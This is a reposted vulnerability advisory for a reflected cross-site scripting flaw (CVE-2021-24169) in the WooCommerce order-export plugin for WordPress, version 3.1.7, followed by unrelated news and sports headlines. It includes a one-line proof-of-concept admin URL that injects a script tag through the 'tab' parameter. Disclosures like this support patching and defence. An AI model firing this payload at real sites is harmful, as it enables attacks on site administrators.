WordPress Advanced Order Export For WooCommerce 3.1.7 Cross Site Scripting

Authored by 0xB9

WordPress Advanced Order Export For WooCommerce plugin version 3.1.7 suffers from a cross site scripting vulnerability.

advisories | CVE-2021-24169

# Exploit Title: WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 15/2/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/woo-order-export-lite/
# Version: 3.1.7
# Tested on: Windows 10
# CVE: CVE-2021-241691. Description:
This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to XSS.
2. Proof of Concept:
wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>

WhatsApp Introduces New Privacy Feature to Protect IP Address in Calls

Zeebo, a Latin American console from the Wii era, is getting an emulator

Source Code Leaks: The Real Problem Nobody Is Paying Attention To

SOVA Android Banking Trojan Returns With New Capabilities and Targets

New Google Chrome feature reduces CPU use to extend battery life

M	T	W	T	F	S	S
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30

WordPress Advanced Order Export For WooCommerce 3.1.7 Cross Site Scripting

Bybmalandrone

Related posts:

You missed

Out 21 months, Leafs’ Murray earns emotional win

Rangers ink lefty sidearmer Milner to 1-year deal

O’s, Dodgers lead in unspent international money

Record 9 MLB teams docked $311M in luxury tax

Shackle Media